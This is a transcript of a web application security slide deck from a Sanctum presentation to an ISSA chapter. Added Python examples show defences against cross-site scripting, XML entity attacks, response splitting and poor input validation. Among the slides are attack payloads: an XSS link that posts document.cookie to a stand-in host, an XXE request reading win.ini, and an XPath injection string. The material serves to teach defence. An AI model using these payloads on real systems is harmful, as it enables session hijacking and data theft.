ISSA Delaware Valley Chapter Meeting
Achieving Enterprise Security through Collaboration
Steve Orrin, CTO, Sanctum Inc.
Posted: 19-Dec-2015 (transcript of the slide deck)
Recent News
• Man admits hacking into NY Times – MSNBC, Jan 8, 2004
• Hackers attack eBay accounts – ZDNet News, Mar 25, 2002
• CA State Agency warns of Security Breach – CNET News, Feb 13, 2004
• Sites Revealed Passwords For Thousands Of Ameritech Users – NewsBytes, Feb 22, 2002
• US Port hit by UK Hacker – BBC, Oct 6, 2003
• FBI investigates hack at e-voting software company – News.com, Dec 30, 2003
• Glitch at Fidelity Canada exposes customer information – ComputerWorld, May 30, 2002
• Hacker Accesses 2.2 Million Credit Cards – CNN, Feb 18, 2003
• Hacker steals 13,000 credit card numbers from US Navy – Washington Post, Aug 23, 2003
• NASA Sites Hacked – ComputerWorld, Dec 17, 2003
• Hackers get Acxiom Customer Information – ComputerWorld, Aug 9, 2003
• FTD.com hole leaks personal information – CNet, Feb 13, 2003
• FTC investigates PetCo.com security holes – SecurityFocus, Dec 5, 2003
Impact of Security Defects
Bad Business
• On average, there are 5 to 15 defects in every 1,000 lines of code (US Dept. of Defense and the Software Engineering Institute)
Slow Business
• It takes 75 minutes on average to track down one defect. Fixing one of these defects takes 2 to 9 hours each (5 Year Pentagon Study)
• Researching each of the 4,200 vulnerabilities published by CERT last year for 10 minutes would have required 1 staffer to research for 17.5 full workweeks or 700 hours (Intel White paper, CERT, ICSA Labs)
Loss of Business
• A company with 1,000 servers can spend $300,000 to test & deploy a patch; most companies deploy several patches a week (Gartner Group)
Pressures on the Application Lifecycle Increasing
Time-to-Market
• Bringing new applications to market quickly
Complexity is Growing
• Increased application lifecycle complexity
Increasing Business Risks Driven by Security Defects
• Rise in Hacker activity
• Government scrutiny and regulation pressures (HIPAA, GLBA, SB1386, etc.)
• Liability precedents for security defects
Costs Escalate Dramatically the longer you wait to Find and Fix
• Bad software costs the economy $59.5 billion a year – cost of breakdowns and repairs (Nat. Institute of Standards & Technology, May 2002)
[Lifecycle diagram: 1. Develop, 2. Test, 3. Audit, 4. Operate]
Why Application Security Defects Matter
Frequent
• 3 out of 4 business websites are vulnerable to attack (Gartner)
Pervasive
• 75% of hacks occur at the Application level (Gartner)
Undetected
• QA testing tools not designed to detect security defects in applications
• Manual patching – reactive, never ending, time consuming & expensive
Dangerous
• When exploited, security defects destroy company value and customer trust
>2000 application ‘Healthchecks’ with AppScan – 98% vulnerable: all had firewalls and encryption solutions in place…
[Pie chart: business impact of the defects found]
• 32% Hijack Session / Identity Theft
• 11% e-Shoplifting
• 21% Full Control and Access to Information
• 2% Delete Web Site
• 27% Privacy Breach
• 7% Modify Information
Business Impact of Application Hacks
Through a browser, a hacker can use even the smallest bug or backdoor to accomplish identity theft, fraud, denial of service and to obtain and manipulate:
• Customer and Consultants records
• Misdirect customers to bogus site
• Change parameters, i.e. total contribution > 100%

Application Threat | Negative Impact | Example Business Impact
Buffer overflow | Denial of Service (DoS) | Site Unavailable to Customers
Cookie poisoning | Session Hijacking | Cash out someone else’s account
Hidden fields | Alter site, Illegal transactions | Change hidden fields, i.e. Account Balance
Debug options | Admin Access | Access to all accounts and information
Cross Site scripting | Identity Theft | Allows intruder transfer of funds
Stealth Commanding | Access O/S and Application | Get list of customer accounts
Parameter Tampering | Fraud, Data Theft | Alter distributions and transfer accounts
Forceful Browsing / SQL Injection | Unauthorized Site/Data Access | Administrative privileges to database with read/write access
3rd Party Misconfiguration | Admin Access | Create new unauthorized database of customers
Published Vulnerabilities | Admin Access, DoS | Create new unauthorized account
Legislation: Validation and Reporting Required
• GLBA: mandatory privacy and security standards in financial services industry (and enforced by the FTC)
• HIPAA: mandatory privacy and security standards in healthcare industry
• FERC: mandatory privacy and security standards in energy industry
• SB1386: Calif law requires companies to warn consumers when personal information may have been stolen
• Sarbanes-Oxley: mandatory auditing controls requiring CEO/CFO to certify adequate “internal control” safeguards are in place
• Putnam Bill (still in debate) – mandatory security audits
Identity Theft complaints come to the FTC at more than 13,000/month

Government and Industry Regulations Impact Matrix on Internet Security
Source: IDC, 2003 (modified)
Regulations (rows): Sarbanes-Oxley Act of 2002, HIPAA, California SB 1386, USA Patriot Act, Gramm-Leach-Bliley Act
Industries (columns): Financial Services, Insurance, Banking, Healthcare, Pharmaceutical, Gov’t
Legend: Yellow = Minor Impact, Orange = Medium Impact, Red = Major Impact [cell colours not reproduced in the transcript]
Example: Cross Site Scripting
• Vulnerability explanation: Extremely common: a flaw in the server’s web page leads to compromise in a client. A third party creates a link (or sends an email) and the URL contains a parameter with a script – once the user connects, the site runs this script.
• Why Cross Site Scripting: Many parameters are implanted within the HTML of following responses, while not checking their content for scripts.
• As a result of this manipulation: “Virtual hijacking” of the session. Any information flowing between the legitimate user and site can be manipulated or transmitted to the evil 3rd party. The fault is simply echoing user input! (Trusting user input!!)
CSS (Cross Site Scripting) In Action
<a href= http://www.insecuresite.com/welcome.asp?name= <FORM action=http://www.badsite.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>>here</a>
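The slide's point is that the fault is echoing the `name` parameter unencoded. The following is an added example (not from the slides or from Sanctum's products) contrasting a vulnerable welcome page with one that HTML-encodes the parameter before echoing it, plus the extra URL-encoding needed when the same value lands in an href attribute. The hypothetical `welcome` page and the shortened copy of the slide's parameter value are constructed for the example.

```python
import html
from urllib.parse import quote

# Constructed sample: the form-plus-script value the slide smuggles into the
# "name" query parameter (shortened), as the web framework would hand it to us
# after URL-decoding.
ATTACK_NAME = ('<FORM action=http://www.badsite.com/data.asp method=post id="idForm">'
               '<INPUT name="cookie" type="hidden"></FORM>'
               '<SCRIPT>idForm.cookie.value=document.cookie;idForm.submit();</SCRIPT>')


def render_welcome_vulnerable(name: str) -> str:
    # Echoes the parameter straight into the HTML body: the flaw the slide
    # describes. Any markup in `name` becomes part of the page.
    return f"<html><body>Welcome, {name}!</body></html>"


def render_welcome_hardened(name: str) -> str:
    # HTML-encode before echoing: < > & " ' become entity references, so the
    # browser displays the parameter as text instead of interpreting it.
    return f"<html><body>Welcome, {html.escape(name, quote=True)}!</body></html>"


def render_profile_link_hardened(name: str) -> str:
    # Attribute/URL context: the value goes through URL-encoding (safe="" so
    # even "/" is encoded) and the visible text through HTML-encoding. Each
    # output context gets the encoding that context understands.
    return f'<a href="/profile?name={quote(name, safe="")}">{html.escape(name)}</a>'


def contains_active_markup(page: str) -> bool:
    # Crude check used to compare the two renderings: a raw <script> or <form>
    # tag in the output means user input was interpreted as markup.
    lowered = page.lower()
    return "<script" in lowered or "<form" in lowered


if __name__ == "__main__":
    print("vulnerable page executes injected markup:",
          contains_active_markup(render_welcome_vulnerable(ATTACK_NAME)))
    print("hardened page executes injected markup:",
          contains_active_markup(render_welcome_hardened(ATTACK_NAME)))
    print(render_profile_link_hardened("O'Brien <test>"))
```

Encoding on output is the minimum the slide asks for ("at the very least, HTML or URL encode the output"); validating the parameter against an allow-list on input is the complementary control, and both should be applied.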
XML/Web Services Attack Vectors
• Old Attacks still valid – CWVs – Injection Attacks – Buffer Overflow – Denial of Service
• The New Manipulation Attacks – Entity and Referral Attacks – DTD and Schema Attacks
• The Next Generation Attacks – Web Service Enabled Application Attacks – Multi-Phase Attacks
Examples: Command Injection SOAP Attacks; SQL Injection in XQuery; Cross-Site Scripting in Client Side XML Documents; SAP/BAPI attacks via SOAP; Entity Expansion Attacks; Endless loop Denial of service Attacks; Schema Redirection Attacks; XPATH Injection
XML Attack Example (Entity Expansion)
An attack on XXX Application Server
1. Find a web service which echoes back user data such as the parameter "in"
2. Use the following SOAP request:
...<!DOCTYPE root [
<!ENTITY foo SYSTEM "file:///c:/winnt/win.ini">]>...<in>&foo;</in>
3. And you'll get C:\WinNT\Win.ini in the response (!!!)
How it works:
A. XXX App Server expands the entity “foo” into full text, gotten from the entity definition URL – the actual attack takes place at this phase (by XXX Application Server itself)
B. XXX App Server feeds input to the web service
C. The web service echoes back the data
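The attack works because the application server resolves the SYSTEM entity before the service ever sees the request. The server-side fix is to never let a request define entities at all. Below is an added example (not the slides' code, and not any vendor's product) of a SOAP request handler that refuses any inline DTD before handing the document to the XML parser, then extracts the `in` parameter. The SOAP 1.1 envelope namespace is the real one; the `in` parameter and the sample envelopes are constructed to match the slide.

```python
import re
import xml.etree.ElementTree as ET

# Entity declarations (SYSTEM entities pointing at local files, and also
# internal entities used for expansion bombs) can only be introduced through
# a DOCTYPE. A request to this service never needs one, so any DOCTYPE is
# rejected before parsing starts.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


class UnsafeXMLError(ValueError):
    """Raised when a request carries a DTD or is not the expected envelope."""


def extract_in_parameter(raw: bytes) -> str:
    # Policy check on the raw bytes, independent of what the parser would do.
    if DOCTYPE_RE.search(raw):
        raise UnsafeXMLError("DOCTYPE/entity declarations are not accepted")
    root = ET.fromstring(raw)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        raise UnsafeXMLError("missing SOAP Body")
    value = body.findtext(".//in")
    if value is None:
        raise UnsafeXMLError("missing <in> parameter")
    return value


def build_request(body_xml: str, dtd: str = "") -> bytes:
    # Constructed helper that assembles sample envelopes for the demonstration.
    return (f'<?xml version="1.0"?>{dtd}'
            f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>{body_xml}'
            f'</soap:Body></soap:Envelope>').encode()


# Constructed samples: the slide's entity declaration, and a benign request.
XXE_REQUEST = build_request(
    '<in>&foo;</in>',
    dtd='<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///c:/winnt/win.ini">]>')
CLEAN_REQUEST = build_request('<in>hello</in>')


def handle(raw: bytes) -> str:
    # What the echo service would send back: the parameter, or a rejection
    # that reveals nothing about the server's file system.
    try:
        return extract_in_parameter(raw)
    except (UnsafeXMLError, ET.ParseError) as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(handle(CLEAN_REQUEST))
    print(handle(XXE_REQUEST))
```

Rejecting the DOCTYPE up front means the outcome does not depend on which parser features happen to be enabled on a given application server, which is exactly the variable the slide's "XXX Application Server" attack exploits.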
Next Generation Attacks: XPath Injection
• Query based injection attack targeting Web applications using XML data sources (XML documents and XML Databases)
• Why XPath Injection?
– Traditional Query Injection: ' or 1=1 or ''='
– XPath Blindfolded Injection
• Attacker extracts information per a single query injection. The novelty is:
– No prior knowledge of XPath query format required (unlike “traditional” SQL Injection attacks).
– Whole XML document eventually extracted, regardless of XPath query format used by application
• Defending against XPath injection (similar to defending against SQL injection)
– The application must sanitize/validate user input
– Use an application firewall in front of the web site
Next Generation Attacks: HTTP Response Splitting
• A new carrier affecting Web Server communications to perform old attacks in a more elegant and malicious way….
• Hackers can easily and with greater immunity perform the following attacks:
– Web Cache Poisoning (new type of attack)
  • poisoning the reverse proxy cache – defacement
  • poisoning an intermediate cache server – next generation phishing
  • poisoning a browser cache – targeted attack
– Hijacking a page (HTTP response) with user sensitive information
  • Diverts a response intended for a client, to the attacker
– Cross-site scripting (XSS)
  • New way to implement XSS with above mentioned added ‘benefits’
Anti-Forensics Properties: A step toward the "perfect hack"!
• Easily reversible – manually by attacker and as part of normal cache operations
– The nature of the attack hampers incident response activities
– Allows for removal of evidence
– Allows the attacker to more easily cloak the evidence of attack
– Web Caching is rarely logged
• End result: a novice cracker can hack with a level of impunity once reserved for the very skilled
How it works
• Normal Request – Response scenario
– User sends request to a Web server/application & Web server/application processes request and sends response
• Attack scenario 1: Attack request (normal request with embedded attack) with 2 responses
– Attacker sends attack request to a web server/application
– Web server/application processes request
– When Web server interprets response from application the attack ‘tricks’ the Web server into breaking the response and sends a second request (the embedded attack request)
– The attack request is sent to user/cache
• Root cause
– Poor user input validation
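The response gets "broken" because a URL-decoded parameter containing CR/LF is copied into a response header. Two defensive pieces follow as an added example (not from the slides): a redirect helper that refuses to build a `Location` header from a value containing CR, LF or NUL, and, since the slide notes that caching is rarely logged, a detector that scans ordinary web-server access-log lines for encoded CR/LF in request URLs. The `redir.asp` endpoint, the `url` parameter and the log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# CR, LF and NUL never belong in a header value; their presence is the whole
# mechanism of response splitting.
FORBIDDEN = re.compile(r"[\r\n\x00]")


class HeaderInjectionError(ValueError):
    pass


def location_from_query(query: str) -> str:
    # The framework URL-decodes parameters, so %0d%0a arrives here as "\r\n".
    params = dict(parse_qsl(query, keep_blank_values=True))
    return params.get("url", "/")


def redirect_headers(target: str) -> list:
    # Builds the headers for a 302. Validating the decoded value is what stops
    # a second, attacker-written response from being spliced in after it.
    if FORBIDDEN.search(target):
        raise HeaderInjectionError("control characters in Location value")
    return [("Location", target)]


# Detection side: encoded CR/LF inside a request URL is a strong signal of an
# attempted header injection, whatever the application did with it.
ENCODED_CRLF = re.compile(r"%0[dD]|%0[aA]")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_crlf_requests(log_lines):
    """Return the client addresses of requests whose URL carries %0d or %0a."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if m and ENCODED_CRLF.search(m.group(1)):
            hits.append(line.split()[0])
    return hits


# Constructed access-log sample in common log format (one benign redirect, one
# attempted injection of an extra header, one unrelated request).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Oct/2003:10:01:12 -0400] "GET /redir.asp?url=%2Faccount HTTP/1.1" 302 0',
    '10.0.0.9 - - [06/Oct/2003:10:01:40 -0400] "GET /redir.asp?url=%2F%0d%0aX-Injected%3A%201 HTTP/1.1" 302 0',
    '10.0.0.7 - - [06/Oct/2003:10:02:03 -0400] "GET /index.asp HTTP/1.1" 200 5120',
]


def handle_redirect(query: str):
    # Returns either the headers or the reason the request was refused.
    try:
        return redirect_headers(location_from_query(query))
    except HeaderInjectionError as exc:
        return f"refused: {exc}"


if __name__ == "__main__":
    print(handle_redirect("url=%2Faccount"))
    print(handle_redirect("url=%2F%0d%0aX-Injected%3A%201"))
    print("suspicious clients:", flag_crlf_requests(SAMPLE_LOG))
```

Modern HTTP libraries (Python's `http.client` among them, since 3.5) already refuse CR/LF in header values, but the check belongs in the application as well, because the slide's point is that the web server in front of the application is the component being tricked.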
The Heart of the Issue: Input Trust
• “All input is evil, until proven otherwise!”
– The root of most serious vulnerabilities: Buffer Overruns, Canonicalization issues, Cross-site Scripting (XSS) attacks, SQL Injection attacks, Integer overflow attacks
• Good guys give you well-formed data, bad guys don’t!
• Don’t rely on your client application providing clean data
– Don’t assume attackers play by the rules
– They go ‘under the radar’
Input Remedies
• Require authenticated connections
• Sanitize all input from untrusted sources
– Look for valid data
– Reject everything else
– High-level languages can use RegExp, e.g. SSN = ^\d{3}-\d{2}-\d{4}$
• Make no assumptions about the trustworthiness of data
• Never directly echo Web-based user input
– Verify input, then echo it
– At the very least, HTML or URL encode the output
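"Look for valid data, reject everything else" is an allow-list, and the slide's SSN pattern is a good one, but the way a regular expression is applied decides whether it really rejects everything else. The added example below (not from the slides) uses the slide's SSN pattern to show two pitfalls in Python's `re`: `^...$` with `match` accepts a trailing newline, and `\d` matches any Unicode digit unless `re.ASCII` is set. It then generalises the idea into a small form validator that also rejects fields the application does not expect. The field rules other than SSN are constructed for the example.

```python
import re

# The slide's pattern, applied two ways.
SSN_ANCHORED_RE = re.compile(r"^\d{3}-\d{2}-\d{4}$")            # as written on the slide
SSN_RE = re.compile(r"\d{3}-\d{2}-\d{4}", re.ASCII)             # for fullmatch


def is_valid_ssn_loose(value: str) -> bool:
    # Pitfall 1: '$' also matches just before a trailing "\n", so
    # "123-45-6789\n" passes and the newline travels on into the application.
    # Pitfall 2: without re.ASCII, \d accepts Arabic-Indic and other Unicode
    # digits, which downstream code may not expect.
    return SSN_ANCHORED_RE.match(value) is not None


def is_valid_ssn(value: str) -> bool:
    # fullmatch requires the entire string to match: nothing before, nothing
    # after, and re.ASCII restricts \d to 0-9.
    return SSN_RE.fullmatch(value) is not None


# Constructed allow-list rules for a hypothetical form. Every rule describes
# what valid data looks like; anything else is rejected.
FIELD_RULES = {
    "ssn": SSN_RE,
    "zip": re.compile(r"\d{5}(-\d{4})?", re.ASCII),
    "username": re.compile(r"[A-Za-z0-9_]{3,32}", re.ASCII),
    "amount": re.compile(r"\d{1,7}(\.\d{2})?", re.ASCII),
}


def validate_form(fields: dict):
    """Allow-list every submitted field.

    Returns (clean, errors). Unknown fields are errors rather than being
    passed through silently, and non-string values are rejected because a
    regex check on a list or number would be meaningless."""
    clean, errors = {}, []
    for key, value in fields.items():
        rule = FIELD_RULES.get(key)
        if rule is None:
            errors.append(f"{key}: unexpected field")
        elif not isinstance(value, str) or rule.fullmatch(value) is None:
            errors.append(f"{key}: does not match expected format")
        else:
            clean[key] = value
    return clean, errors


if __name__ == "__main__":
    print("loose accepts trailing newline:", is_valid_ssn_loose("123-45-6789\n"))
    print("strict accepts trailing newline:", is_valid_ssn("123-45-6789\n"))
    print(validate_form({"ssn": "123-45-6789", "zip": "19103", "extra": "x"}))
```

The validator returns the cleaned copy rather than a pass/fail flag so that later code consumes only values that went through the allow-list; output encoding (the slide's last bullet) is still applied separately when those values are echoed.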
Introducing Risk Early: The Vicious Cycle
Design, Develop, & Test / Staging
• Responsibilities – Develop high quality secure apps
• Tools – IDEs – Performance & functionality QA tools – Manual test scripts and code review – Freeware
• Challenges – Don’t have the tools, time or training for security testing
• Result – Dangerous security defects passed downstream to operations – Code comes back to development to work on again……
Deployment & Operations / Production
• Responsibilities – Audit apps before/after deployment – Patch & fix – Communicate to development
• Tools – Network Scanners – Vulnerability Assessment Tools
• Challenges – Ran out of time! – Being measured on deployment – not sending back to development
• Results – Kept waiting for quality software to deploy – Anxious about overall software quality deployed – the next attack….
Development is fertile ground for security bugs…
Ops, Admins, & Auditors are expensive exterminators…
Automated Security Testing for the Application Lifecycle
Develop (Developer):
• Construct application
• Unit test application components
Test (Tester/QA Engineer):
• Create test plan
• Create, run & manage test scripts
• Defect assignment & tracking
• Delta, trend and results analysis
• Approve release to production
Audit (Ops & Security Auditor):
• Create operations plan
• Deploy & maintain business compliance
• Scheduled (or not!) application audits
Financial Impact
Cost to Fix dramatically increases the longer you wait to test
[Chart: Cost of Backlog – Statistics from 10 F100 Companies; y-axis: Percent of Applications, 0 to 100]
1. 92% of applications fail security testing; 8% pass
2. 80% pass; 20% fail
3. Of the 20%: half pass, half never pass
= 2.5 month avg. delay > $25M in lost savings/revenue
The Bottom Line
Costs of defects introduced early in lifecycle quickly add up
• Untested applications in production
• Longer development cycles
• More development cycles
• Considerable business risks
Understand, Communicate, Measure
• Understand your exposure
– Use tools that scan for exposure points at the web server and application layers as part of application development process
– The data collected must be relevant to the audience receiving it
– The importance of terminology and types of data provided
• Communicate the exposures (security defects)
– Various stake holders in the development lifecycle need different types of data
– Use the tracking tools already in place
– Map security defects to business needs
• Measure your assessment process / security defect remediation
– Analyze exposure from individual assessments and compare results across the cycle
From Vicious to Virtuous Development Cycle
Give developers, QA and administrators the tools and training they need to succeed!
The Result: Address Compliance
Application Threat Impacts GLBA / HIPAA
Security testing addresses: Buffer overflow, Cookie poisoning, Hidden fields, Debug options, Cross Site scripting, Stealth Commanding, Parameter Tampering, Forceful Browsing/SQL Injection, 3rd Party Misconfiguration, Published Vulnerabilities
GLBA/HIPAA Mandate:
• Ensure the security & confidentiality of customer records and information
• Protect against any unanticipated threat or hazard to the security or integrity of these records
• Protect against unauthorized access that could result in substantial harm or inconvenience to customer
Network devices do not detect these vulnerabilities
The Result: Address Compliance
Application Threat Impacts SB 1386
Security testing addresses: Buffer overflow, Cookie poisoning, Hidden fields, Debug options, Cross Site scripting, Stealth Commanding, Parameter Tampering, Forceful Browsing/SQL Injection, 3rd Party Misconfiguration, Published Vulnerabilities
SB 1386 Mandate:
• Prevent unauthorized access to California customers or employee personal information
• Penalty of breach: each customer/employee must be individually notified in writing of breach in confidentiality in less than two weeks.
• Otherwise, a public announcement to the press must occur
Automated Web Application Testing and Risk Assessment
S.A.F.E.: Speed, Accuracy, Flexibility and Efficiency
Site Smart for QA and Audit:
• Seamlessly integrates into any QA or Audit environment
• Tests both new and existing Internet infrastructures
• Ensures Compliance of security best practices and external regulations
Application Lifecycle Security: Accelerates ROI
• increased revenue
• increased customer satisfaction
• decreased customer acquisition and retention costs
Application Lifecycle Security to increase the Speed and Ease of Application Deployment in a Secure Environment
Application Security Across the Lifecycle
• Incorporate security into the process – early on and at each stage
• Document and report – demonstrate compliance
• Improve overall result
• Reduce costs
1. Develop – AppScan DE – RELIABILITY – Create ‘hacker resistant’ applications
2. Test – AppScan QA – ASSURANCE – Test application quality
3. Audit – AppScan Audit – VALIDATION – Audit for security and compliance
4. Operate – AppShield – CONFIDENCE – Maintain application integrity and user confidence